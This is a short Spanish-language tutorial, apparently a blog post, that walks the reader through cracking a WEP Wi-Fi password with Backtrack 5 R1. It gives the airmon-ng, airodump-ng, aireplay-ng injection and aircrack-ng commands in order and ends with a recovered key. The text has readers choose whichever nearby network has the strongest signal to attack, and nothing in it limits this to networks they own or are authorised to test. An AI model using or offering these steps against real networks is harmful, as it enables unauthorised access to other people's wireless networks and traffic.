Backtrack 5R1

*Iniciar backtrack 5 R1 desde el disco de instalacion. *Abrir la terminal en backtrack 5 R1. *Escribir iwconfig (esto es para ver en donde esta nuestra tarjeta que puede apáreseen lo, eth0 o wlan0, a mí me apárese en wlan0).

*Escribir airmon-ng start wlan0 (el wlan0 es su tarjeta si aparese en lo o etho solo cambienlo por su tarjeta).

*Escribirairodump-ng mon0 (el mon0 es su tarjeta que aparece entre parentesis al final de la imagen anterior, si aparese otro cambiarlo).

Este comando es para empesar a capturar las redesque estan al alcance, ya que aya pasado 1 minuto le damos CTRL+C para detener la captura, es hora de elegir que red atacar, de preferencia la que tenga mayor señal.

*Escribirairodump-ng -w crack --bssid (aquí colocamos la dirección mac de la red que atacaremos “BSSID”) -c (aquí colocamos el canal de la red “CH”) mon0.

*

Aparesera otra pantalladonde el objetivo principal es capturar, son datos “#Data,”.

*Abrimos otra terminal sin cerrar la primera. *Escribir aireplay-ng -1 0 -a (escribimos la mac “BSSID”) mon0.*Escribir aireplay-ng -3 -b (mac atacar) mon0.

*Abrir otra terminal sin cerrar las 2 anteriores. *Escribir dir y esperamos unos segundos.

*Escribir aircrack-ng crack-1.cap y damosenter. Nos mostrara una pantalla con muchos numeros y letras, esperemos a que nos de el key.

Si le damos aircrack-ng crack-1.cap y nos aparece Failed. Next try with 5000 IVs esporque a capturado pocos paquetes para saber cuanto nos falta, solo esperamos a que nos aparesca (got 13000 IVs) o un numero superior.

Cuando el numero del (got 13231 IVs) seamayor o igual a 13000 nos mostrara la clave como KEY FOUND!. Para conectarnos a la red solo escribimos el numero que nos aparece sin los 2 puntos, en este caso es: 3561643637